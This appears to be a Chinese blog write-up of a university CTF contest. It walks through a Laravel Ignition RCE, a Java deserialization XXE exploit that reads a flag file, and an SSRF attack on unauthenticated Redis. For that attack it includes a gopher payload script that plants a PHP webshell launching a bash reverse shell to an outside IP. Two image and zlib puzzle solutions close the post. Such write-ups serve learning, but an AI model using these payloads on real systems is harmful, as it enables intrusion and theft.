

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.jpg">
  <link rel="icon" href="/img/favicon.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="前言感觉好长时间没打过月赛了，两天时间，不过感觉题有点少 Web-llllaravellll只给一个laravel框架搭建成功的页面，没找他其他提示便进行扫描.htaccess、web.config和robots.txt都是配置文件，没发现有用的地方hello界面看起来有点东西但没提示先放一边剩一个&#x2F;_ignition&#x2F;execute-solution访问，发现报错页面 提示需">
<meta property="og:type" content="article">
<meta property="og:title" content="neuqcsa-四月月赛">
<meta property="og:url" content="http://gofervor.com/2022/04/18/neuqcsa-%E5%9B%9B%E6%9C%88%E6%9C%88%E8%B5%9B/index.html">
<meta property="og:site_name" content="b1ub1u的小站">
<meta property="og:description" content="前言感觉好长时间没打过月赛了，两天时间，不过感觉题有点少 Web-llllaravellll只给一个laravel框架搭建成功的页面，没找他其他提示便进行扫描.htaccess、web.config和robots.txt都是配置文件，没发现有用的地方hello界面看起来有点东西但没提示先放一边剩一个&#x2F;_ignition&#x2F;execute-solution访问，发现报错页面 提示需">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/04/18/j36oil_0.png">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/04/18/j33x4n_0.png">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/04/18/j36mj8_0.png">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/04/18/j36j9k_0.png">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/04/18/j5i3io_0.png">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/04/18/krxerm_0.png">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/04/18/krxf48_0.png">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/04/18/krxk4c_0.png">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/04/18/krxew4_0.png">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/04/18/krxnlo_0.png">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/04/18/krxsfr_0.png">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/04/18/nzgocb_0.png">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/04/18/nwmonx_0.png">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/04/18/o142km_0.png">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/04/18/o14231_0.png">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/04/18/o141m6_0.png">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/04/18/o1465f_0.png">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/04/18/o1491a_0.png">
<meta property="article:published_time" content="2022-04-18T03:17:53.000Z">
<meta property="article:modified_time" content="2023-03-02T10:23:54.842Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://120.27.243.85:11111/i/2022/04/18/j36oil_0.png">
  
  
  <title>neuqcsa-四月月赛 - b1ub1u的小站</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->

  
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/shubiao.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"gofervor.com","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 6.0.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>biubiu~</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.jpeg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="neuqcsa-四月月赛">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-04-18 11:17" pubdate>
        2022年4月18日 上午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      7k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      59 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">neuqcsa-四月月赛</h1>
            
            <div class="markdown-body">
              <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>感觉好长时间没打过月赛了，两天时间，不过感觉题有点少</p>
<h2 id="Web-llllaravellll"><a href="#Web-llllaravellll" class="headerlink" title="Web-llllaravellll"></a>Web-llllaravellll</h2><p>只给一个laravel框架搭建成功的页面，没找他其他提示便进行扫描<br><img src="http://120.27.243.85:11111/i/2022/04/18/j36oil_0.png" srcset="/img/loading.gif" lazyload><br>.htaccess、web.config和robots.txt都是配置文件，没发现有用的地方<br>hello界面看起来有点东西但没提示先放一边<br>剩一个&#x2F;_ignition&#x2F;execute-solution访问，发现报错页面<br><img src="http://120.27.243.85:11111/i/2022/04/18/j33x4n_0.png" srcset="/img/loading.gif" lazyload></p>
<p>提示需要POST数据，看了下相关文件也不知道大概要干啥<br>一般像这种框架类的漏洞网上很多文章分析<br>于是google：ctf laravel8 漏洞<br>看了几篇文章，laravel8大概就两个漏洞：反序列化、Debug RCE(CVE-2021-3129)<br>但是反序列化我们没全部源码找不到反序列化点<br>debug rce版本符合也有&#x2F;_ignition&#x2F;execute-solution<br>进行尝试<br><img src="http://120.27.243.85:11111/i/2022/04/18/j36mj8_0.png" srcset="/img/loading.gif" lazyload></p>
<p>发现有报错信息：file_get_contents(b1ub1u): failed to open stream: No such file or directory in file<br>证明有这个漏洞<br>原理大概是操控 ..&#x2F;storage&#x2F;logs&#x2F;laravel.log 日志文件，配合 php:&#x2F;&#x2F;filter的特性来构建 phar 文件(这里需要用phpggc里的链子构造文件)，执行反序列化<br>手注的话每次命令都要发五个包，于是我选择上github直接搜集成好链子的工具嘿嘿<br>试了第二次就有行的了，在python里改命令就行<br><img src="http://120.27.243.85:11111/i/2022/04/18/j36j9k_0.png" srcset="/img/loading.gif" lazyload></p>
<p>Flag：flag{LaRAvel_1s_PrEtTy_1nterRESt1NG!}</p>
<h2 id="Web-babyser"><a href="#Web-babyser" class="headerlink" title="Web-babyser"></a>Web-babyser</h2><p>题目给的war包让大家审计一下三个java文件<br>User.java注意到重写了readObject方法，并且里面用到了DocumentBuilderFactory类</p>
<p>HelloServlet.java可以注意到用到了append(“Hello! “ + u.name)，这里可以联想到类似于SSTI的方法，传入的name如果有漏洞，可以通过u.name回显出来，可以留意一下</p>
<p>HelloInputStream.java我没有很看懂，只认识出”top.inhann.babyser.User”，但下面那个resolveClass没有太理解</p>
<p>综合三个java文件，没有直接能得出flag的方法&#x2F;类，也没有明确flag出现的条件。<br>所以尝试从DocumentBuilderFactory类入手<br>搜了一下都是关于XML的，然后晚上又放一个hint：xxe，所以方向应该没错了</p>
<p>呃这里直接从网上找到了类似的exp，等比赛完再仔细分析一下，因为这个DocumentBuilderFactory类好像不算少见。原理就是DocumentBuilderFactory类能读取xxe，然后回显到u.name</p>
<p>重写一下User.java，增加一个writeObject方法</p>
<figure class="highlight xml"><table><tr><td class="gutter"><div class="code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></div></td><td class="code"><pre><code class="hljs xml">private void writeObject (ObjectOutputStream out) throws ClassNotFoundException, IOException, ParserConfigurationException, SAXException&#123;<br>      String xml = &quot;<span class="hljs-meta">&lt;?xml version=\&quot;1.0\&quot; encoding=\&quot;UTF-8\&quot;?&gt;</span>  \n&quot; +<br>              &quot;<span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">ANY</span> [  \n&quot; +</span><br><span class="hljs-meta">              &quot;<span class="hljs-meta">&lt;!ENTITY <span class="hljs-keyword">shit</span> <span class="hljs-keyword">SYSTEM</span> \<span class="hljs-string">&quot;file:///flag.txt\&quot;&gt;   \n&quot;</span> +</span></span><br><span class="hljs-meta"><span class="hljs-meta">              <span class="hljs-string">&quot;]&gt;  \n&quot;</span> +</span></span><br><span class="hljs-meta"><span class="hljs-meta">              <span class="hljs-string">&quot;&lt;root&gt;&lt;tag&gt;&amp;shit;&lt;/tag&gt;&lt;/root&gt; &quot;</span>;</span></span><br><span class="hljs-meta"><span class="hljs-meta">      <span class="hljs-keyword">byte</span>[] <span class="hljs-keyword">bs</span> = <span class="hljs-keyword">xml</span>.getBytes();</span></span><br><span class="hljs-meta"><span class="hljs-meta">      <span class="hljs-keyword">out</span>.writeInt(<span class="hljs-keyword">bs</span>.<span class="hljs-keyword">length</span>);</span></span><br><span class="hljs-meta"><span class="hljs-meta">      <span class="hljs-keyword">ByteArrayOutputStream</span> <span class="hljs-keyword">baos</span> = <span class="hljs-keyword">new</span> <span class="hljs-keyword">ByteArrayOutputStream</span>(<span class="hljs-keyword">bs</span>.<span class="hljs-keyword">length</span>);</span></span><br><span class="hljs-meta"><span class="hljs-meta">      <span class="hljs-keyword">baos</span>.write(<span class="hljs-keyword">bs</span>);</span></span><br><span class="hljs-meta"><span class="hljs-meta">      <span class="hljs-keyword">out</span>.write(<span class="hljs-keyword">baos</span>.<span class="hljs-keyword">toByteArray</span>());</span></span><br><span class="hljs-meta"><span class="hljs-meta">   &#125;</span></span><br></code></pre></td></tr></table></figure>

<p>然后新建一个test.java</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> top.inhann.babyser;		<span class="hljs-comment">//这里好像要对应HelloInputStream.java里的白名单</span><br><br><span class="hljs-keyword">import</span> java.io.FileOutputStream;<br><span class="hljs-keyword">import</span> java.io.ObjectOutputStream;<br><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">test</span> &#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> Exception &#123;<br>        <span class="hljs-type">User</span> <span class="hljs-variable">user</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">User</span>(<span class="hljs-string">&quot;b1ub1u&quot;</span>);<br>        <span class="hljs-type">ObjectOutputStream</span> <span class="hljs-variable">oos</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ObjectOutputStream</span>(<span class="hljs-keyword">new</span> <span class="hljs-title class_">FileOutputStream</span>(<span class="hljs-string">&quot;./exp&quot;</span>));<br>        oos.writeObject(user);<br>        oos.close();<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>运行test.java可以得到一个新文件exp<br>在当前目录新建一个python文件，将exp读取并发出</p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs livecodeserver">import requests<br><br>url = <span class="hljs-string">&#x27;http://47.94.9.17:18387/hello/hello-servlet&#x27;</span><br>f = <span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;exp&#x27;</span>,<span class="hljs-string">&#x27;rb&#x27;</span>)<br><span class="hljs-built_in">exp</span> = f.<span class="hljs-built_in">read</span>()<br>r = requests.<span class="hljs-built_in">post</span>(url = url,data=<span class="hljs-built_in">exp</span>)<br>print r.content<br></code></pre></td></tr></table></figure>
<p><img src="http://120.27.243.85:11111/i/2022/04/18/j5i3io_0.png" srcset="/img/loading.gif" lazyload></p>
<p>Flag：flag{318bf80bd83fe1f19d4b2cd3d7b53afd}</p>
<h2 id="Web-easyssrf-build"><a href="#Web-easyssrf-build" class="headerlink" title="Web-easyssrf (build)"></a>Web-easyssrf (build)</h2><p>html代码提示b1ub1u.php<br> <img src="http://120.27.243.85:11111/i/2022/04/18/krxerm_0.png" srcset="/img/loading.gif" lazyload></p>
<p>传入?info&#x3D;1访问phpinfo<br>得到关键信息：内网ip为172.19.0.3<br> <img src="http://120.27.243.85:11111/i/2022/04/18/krxf48_0.png" srcset="/img/loading.gif" lazyload></p>
<p>传入?url&#x3D;<a target="_blank" rel="noopener" href="http://www.baidu.com/">www.baidu.com</a> 可以确定SSRF<br>过滤了localhost、127.0.0.1、file协议、dict协议<br>我们可以用172.19.0.X、gopher协议、http协议<br>通过burp探测该网段上存活的主机<br> <img src="http://120.27.243.85:11111/i/2022/04/18/krxk4c_0.png" srcset="/img/loading.gif" lazyload><br>有172.19.0.1，172.19.0.2，172.19.0.3<br>其中172.19.0.2回显了Go away;Go away;Quickly Give me Go away<br>然后通过爆破来探测172.19.0.2开放的端口，可以看到开放了80和6378端口</p>
<p> <img src="http://120.27.243.85:11111/i/2022/04/18/krxew4_0.png" srcset="/img/loading.gif" lazyload></p>
<p>根据回显信息猜测恶6378启用了redis服务并且无密码<br>尝试用gopher协议下马来攻击未授权redis<br>用脚本或者github上的工具gopher-master都可以写payload<br>由于172.19.0.2的80端口开放了http服务，可以尝试在&#x2F;var&#x2F;www&#x2F;html目录下马<br>发现不行，这里可以扫描html目录下的目录，发现有个upload目录<br><img src="http://120.27.243.85:11111/i/2022/04/18/krxnlo_0.png" srcset="/img/loading.gif" lazyload></p>
<p>尝试在&#x2F;var&#x2F;www&#x2F;html&#x2F;upload&#x2F;目录下种马</p>
<p>附上写payload的脚本</p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs livecodeserver">import urllib<br>protocol=<span class="hljs-string">&quot;gopher://&quot;</span><br>ip=<span class="hljs-string">&quot;172.19.0.2&quot;</span><br>port=<span class="hljs-string">&quot;6378&quot;</span><br><span class="hljs-built_in">shell</span>=<span class="hljs-string">&quot;\n\n&lt;?php system(\&quot;bash -c &#x27;exec bash -i &gt;&amp; /dev/tcp/81.70.101.23/6666 0&gt;&amp;1&#x27;\&quot;);?&gt;\n\n&quot;</span><br>filename=<span class="hljs-string">&quot;b1ub1u.php&quot;</span><br>path=<span class="hljs-string">&quot;/var/www/html/upload&quot;</span><br>passwd=<span class="hljs-string">&quot;&quot;</span><br>cmd=[<span class="hljs-string">&quot;flushall&quot;</span>,<br>    <span class="hljs-string">&quot;set 1 &#123;&#125;&quot;</span>.<span class="hljs-built_in">format</span>(<span class="hljs-built_in">shell</span>.<span class="hljs-built_in">replace</span>(<span class="hljs-string">&quot; &quot;</span>,<span class="hljs-string">&quot;$&#123;IFS&#125;&quot;</span>)),<br>    <span class="hljs-string">&quot;config set dir &#123;&#125;&quot;</span>.<span class="hljs-built_in">format</span>(path),<br>    <span class="hljs-string">&quot;config set dbfilename &#123;&#125;&quot;</span>.<span class="hljs-built_in">format</span>(filename),<br>    <span class="hljs-string">&quot;save&quot;</span><br>    ]<br><span class="hljs-keyword">if</span> passwd:<br>    cmd.insert(<span class="hljs-number">0</span>,<span class="hljs-string">&quot;AUTH &#123;&#125;&quot;</span>.<span class="hljs-built_in">format</span>(passwd))<br>payload=protocol+ip+<span class="hljs-string">&quot;:&quot;</span>+port+<span class="hljs-string">&quot;/_&quot;</span><br>def redis_format(arr):<br>    <span class="hljs-literal">CRLF</span>=<span class="hljs-string">&quot;\r\n&quot;</span><br>    redis_arr = arr.<span class="hljs-built_in">split</span>(<span class="hljs-string">&quot; &quot;</span>)<br>    cmd=<span class="hljs-string">&quot;&quot;</span><br>    cmd+=<span class="hljs-string">&quot;*&quot;</span>+str(<span class="hljs-built_in">len</span>(redis_arr))<br>    <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> redis_arr:<br>        cmd+=<span class="hljs-literal">CRLF</span>+<span class="hljs-string">&quot;$&quot;</span>+str(<span class="hljs-built_in">len</span>((x.<span class="hljs-built_in">replace</span>(<span class="hljs-string">&quot;$&#123;IFS&#125;&quot;</span>,<span class="hljs-string">&quot; &quot;</span>))))+<span class="hljs-literal">CRLF</span>+x.<span class="hljs-built_in">replace</span>(<span class="hljs-string">&quot;$&#123;IFS&#125;&quot;</span>,<span class="hljs-string">&quot; &quot;</span>)<br>    cmd+=<span class="hljs-literal">CRLF</span><br>    <span class="hljs-literal">return</span> cmd<br><br><span class="hljs-keyword">if</span> __name__==<span class="hljs-string">&quot;__main__&quot;</span>:<br>    <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> cmd:<br>        payload += urllib.<span class="hljs-literal">quote</span>(redis_format(x))<br>print payload<br></code></pre></td></tr></table></figure>
<p>得到payload：<br><code>gopher://172.19.0.2:6378/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2480%0D%0A%0A%0A%3C%3Fphp%20system%28%22bash%20-c%20%27exec%20bash%20-i%20%3E%26%20/dev/tcp/81.70.101.23/6666%200%3E%261%27%22%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2420%0D%0A/var/www/html/upload%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%2410%0D%0Ab1ub1u.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A</code></p>
<p>二次编码后发出<br>vps监听端口<br>然后访问?url&#x3D;172.19.0.2&#x2F;upload&#x2F;b1ub1u.php<br>就能反弹到shell了<br><img src="http://120.27.243.85:11111/i/2022/04/18/krxsfr_0.png" srcset="/img/loading.gif" lazyload></p>
<p>Flag：flag{shit~bro!What_a_beautiful_hacking_process!}</p>
<h2 id="Web-wowwow-复现"><a href="#Web-wowwow-复现" class="headerlink" title="Web-wowwow (复现)"></a>Web-wowwow (复现)</h2><p>先鸽一下啧啧啧</p>
<h2 id="Real-World-RealWorld"><a href="#Real-World-RealWorld" class="headerlink" title="Real World-RealWorld"></a>Real World-RealWorld</h2><p>题目是neuq某协会的oj平台<br>不方便透漏具体解题步骤了，原理是题目代码可以任意执行，可以用来反弹shell<br><img src="http://120.27.243.85:11111/i/2022/04/18/nzgocb_0.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="Misc-拼图游戏"><a href="#Misc-拼图游戏" class="headerlink" title="Misc-拼图游戏"></a>Misc-拼图游戏</h2><p>首先是将100张图片拼成一张图片<br>脚本如下</p>
<figure class="highlight processing"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs processing">from PIL <span class="hljs-keyword">import</span> Image<br><span class="hljs-keyword">import</span> os<br><br>i,j = <span class="hljs-number">0</span>,<span class="hljs-number">0</span><br>imax,jmax = <span class="hljs-number">10</span>,<span class="hljs-number">10</span><br><br>im = Image.<span class="hljs-property">open</span>(<span class="hljs-string">&quot;1bf376.png&quot;</span>,<span class="hljs-string">&#x27;r&#x27;</span>)<br><span class="hljs-built_in">width</span>,<span class="hljs-built_in">height</span> = im.<span class="hljs-property">size</span><br>big_img = Image.<span class="hljs-property">new</span>(<span class="hljs-string">&quot;RGB&quot;</span>,(imax*<span class="hljs-built_in">width</span>,jmax*<span class="hljs-built_in">height</span>))<br><br>dirs = os.<span class="hljs-property">listdir</span>(<span class="hljs-string">&#x27;./&#x27;</span>)<br><br><span class="hljs-keyword">for</span> k in dirs:<br>    <span class="hljs-keyword">if</span>(k.<span class="hljs-property">endswith</span>(<span class="hljs-string">&#x27;png&#x27;</span>)):<br>        # do something<br>        curim = Image.<span class="hljs-property">open</span>(k,<span class="hljs-string">&#x27;r&#x27;</span>)<br>        region = curim.<span class="hljs-property">crop</span>((<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-built_in">width</span>,<span class="hljs-built_in">height</span>))<br>        big_img.<span class="hljs-property">paste</span>(region,(i*<span class="hljs-built_in">width</span>,j*<span class="hljs-built_in">height</span>),None)<br>        # next pointer<br>        j += <span class="hljs-number">1</span><br>        <span class="hljs-keyword">if</span> j == jmax :<br>            i += <span class="hljs-number">1</span><br>            j = <span class="hljs-number">0</span><br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">continue</span><br><br>big_img.<span class="hljs-property">show</span>()<br>big_img.<span class="hljs-property">save</span>(<span class="hljs-string">&quot;out.png&quot;</span>,<span class="hljs-string">&#x27;png&#x27;</span>)<br><br></code></pre></td></tr></table></figure>
<p>然后使用gaps工具将图片间重组<br><img src="http://120.27.243.85:11111/i/2022/04/18/nwmonx_0.png" srcset="/img/loading.gif" lazyload></p>
<p>观察数据应该是zip压缩包，在头部补充50 4B 03 04<br>压缩包解压后base85解密，再摩斯码解密，得到flag</p>
<p>Flag：flag{ae86673d4848fac7e0a3a243edfc0f26}</p>
<h2 id="Misc-两部分的flag-build"><a href="#Misc-两部分的flag-build" class="headerlink" title="Misc-两部分的flag (build)"></a>Misc-两部分的flag (build)</h2><p>解题方法：zlib解压+bkcrack明文攻击深入利用</p>
<p>题目开始很简单，一开始zlib的数据头没有改动，如果改动了binwalk检测不出来，只能用010editor一节节的看，就有点难了。<br> <img src="http://120.27.243.85:11111/i/2022/04/18/o142km_0.png" srcset="/img/loading.gif" lazyload><br>这里binwalk可以看到多出一段default compression<br>zsteg可以直接将这段数据提取出来了，也可以用16进制编辑器复制下来</p>
<p>用pngcheck也可以看出有段IDAT数据是错的，根据789C可以判断是zlib出错<br> <img src="http://120.27.243.85:11111/i/2022/04/18/o14231_0.png" srcset="/img/loading.gif" lazyload></p>
<p>对zlib数据解压，这里脚本很多，因为2018年ciscn的一道misc就是这种<br>先对十六进制数据unhexlify，再decompress解压数据，可以看到是base64格式，再b64decode解码，最后将数据装入一个文件中就得到了zip文件，脚本如下</p>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs 1c">import zlib<br>import binascii<br>import base64<br><br>id = &#x27;789c858d4b0f<span class="hljs-number">82301084</span>7f<span class="hljs-number">1246</span>6b<span class="hljs-number">2207</span>0fbbbc040b69cb43e80d<span class="hljs-number">141542416382</span>f8efb<span class="hljs-number">5898</span>fa393cd97d9cd<span class="hljs-number">662675</span>6e<span class="hljs-number">36220778</span>0d<span class="hljs-number">5857</span>b3ed842d<span class="hljs-number">57954141</span>ef1ae06b<span class="hljs-number">4835</span>9de<span class="hljs-number">5633</span>9ab37b1d1b06ab<span class="hljs-number">7818</span>b8cca70aef<span class="hljs-number">2912</span>eaca4e747db04c682fcde784e38b9ddcd2c<span class="hljs-number">7146</span>c<span class="hljs-number">620145</span>dddb<span class="hljs-number">419891</span>a<span class="hljs-number">11754881</span>fb06fcebb<span class="hljs-number">3387</span>ce47f1daaca737bda0b<span class="hljs-number">7280</span>e177e<span class="hljs-number">750809</span>f4c6a4a<span class="hljs-number">77697442759261</span>260e7c0eee96ecd98aa<span class="hljs-number">44601195</span>2e4c5e71fc11d745efc4e583f<span class="hljs-number">0153</span>f34de3&#x27;<br>result = binascii.unhexlify(id)<br>print(result)<br>result = zlib.decompress(result)<br>print(result)<br>result = base64.b64decode(result)<br>print(result)<br>fount = open(r<span class="hljs-string">&quot;flag.zip&quot;</span>, <span class="hljs-string">&quot;wb&quot;</span>)		<span class="hljs-comment">//将数据写入flag.zip</span><br>fount.write(result)<br>fount.close()<br></code></pre></td></tr></table></figure>

